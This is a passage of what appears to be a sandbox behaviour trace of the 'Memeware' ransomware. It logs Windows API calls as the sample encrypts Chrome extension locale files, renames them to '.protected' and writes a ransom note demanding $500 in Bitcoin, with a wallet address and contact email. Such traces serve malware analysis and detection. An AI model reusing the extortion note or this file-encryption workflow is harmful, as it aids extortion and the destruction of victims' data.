lpString2="$Recycle.bin") returned 1 [0079.996] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0079.996] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar") returned 141 [0079.996] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0079.996] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0079.996] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\*") returned 143 [0079.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.996] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.996] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.996] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.996] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.996] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.996] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\.") returned 143 [0079.996] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.997] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.997] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.997] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.997] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.997] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.997] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.997] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\..") returned 144 [0079.997] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.997] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.997] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.997] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.997] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.997] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.997] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.997] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.997] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json") returned 155 [0079.997] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.997] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.997] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.997] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json") returned 155 [0079.998] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json") returned 155 [0079.998] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json") returned 155 [0079.998] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.998] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0079.999] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.999] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0079.999] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.999] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.999] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.000] CloseHandle (hObject=0x168) returned 1 [0080.000] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.protected") returned 165 [0080.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.protected")) returned 1 [0080.001] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.001] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.001] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\RESTORE_FILES.txt") returned 159 [0080.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.001] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.001] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.002] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.002] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.002] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.002] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.002] CloseHandle (hObject=0x164) returned 1 [0080.002] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.002] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0080.002] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0080.002] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0080.002] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0080.002] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0080.002] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg") returned 141 [0080.002] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0080.002] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0080.002] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\*") returned 143 [0080.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.002] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.002] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.002] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.002] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.002] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\.") returned 143 [0080.003] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.003] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.003] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.003] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.003] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.003] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.003] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\..") returned 144 [0080.003] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.003] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.003] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.003] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.003] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.003] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.003] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.003] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json") returned 155 [0080.003] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.003] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.003] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.003] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.003] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json") returned 155 [0080.003] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.003] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json") returned 155 [0080.003] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.003] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json") returned 155 [0080.003] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.003] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x12f, lpOverlapped=0x0) returned 1 [0080.004] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffed1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.004] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x12f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x12f, lpOverlapped=0x0) returned 1 [0080.004] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.004] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.004] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.004] CloseHandle (hObject=0x168) returned 1 [0080.005] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.protected") returned 165 [0080.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.protected")) returned 1 [0080.005] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.005] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.005] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\RESTORE_FILES.txt") returned 159 [0080.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.005] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.005] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.006] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.006] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.006] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.006] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.006] CloseHandle (hObject=0x164) returned 1 [0080.006] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.006] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0080.006] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0080.007] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0080.007] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0080.007] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0080.007] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca") returned 141 [0080.007] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0080.007] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0080.007] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: 